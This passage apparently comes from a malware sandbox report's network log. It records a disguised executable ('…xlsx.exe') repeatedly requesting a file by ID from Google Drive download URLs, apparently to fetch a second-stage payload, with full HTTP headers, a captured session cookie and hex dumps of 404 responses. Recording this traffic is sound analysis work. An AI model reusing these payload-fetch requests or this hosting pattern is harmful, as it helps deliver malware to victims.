                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.650002142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:54 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:55 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6wDUyyhJyymcLpAnb-Y-MR213vNES_SiwhEusWybTLMaMid1-ffFKZRjKiB9ZguzqG
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:55 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7LMe386rfH91p3LmUy6pBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:06:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 74 55 33 2d 62 66 34 73 62 55 52 45 68 52 61 32 56 69 4f 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7tU3-bf4sbUREhRa2ViOUg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.650022172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:07 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:08 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:08 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-ocU69I1BoV-fHlxQEvM3Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.650023142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:10 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:11 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7aweZMacvmUf5gu6P_92Y143zJ-IcQZHTqpX_CLjH8f2Fe9dwf2xiPzQXE8Z902rRR
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:11 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-aq1AFrrxZ3LER01lHV6nWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:07:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 44 50 4f 48 45 39 59 46 51 6b 72 33 50 6d 6a 76 75 4b 70 33 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gDPOHE9YFQkr3PmjvuKp3Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.650024172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:24 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:25 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:24 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-hnj9gX41-FltgY1jyXjX7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.650025142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:27 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:28 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7UPMuB80rDbALWgk-Q7HuTIc42Nb5-mH2sXTEMr0Li_jKeAWNBWVH4BMkUbzxkHQRO
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:27 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-PMfDxcEX284aRXl0mEZaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:07:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 59 78 72 33 5a 69 70 63 55 35 72 79 72 52 49 58 7a 6a 72 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UYxr3ZipcU5ryrRIXzjrNg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.650027172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:40 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:41 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:40 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-_2JLqzX6LTmsM4z9gM4WSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.650028142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:42 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:43 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7lhzDMhaIkxEICzsWwrnilFgThikntNQtqZZmlRb6jEUxRL1uwozKZj3VYDFEEAJuP
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:43 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-IXILVF3bU-z09tFmVcjZ_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:07:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 35 58 5f 36 31 4c 37 6f 46 46 73 5f 30 35 50 74 65 64 45 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T5X_61L7oFFs_05PtedEBg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.650029172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:55 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
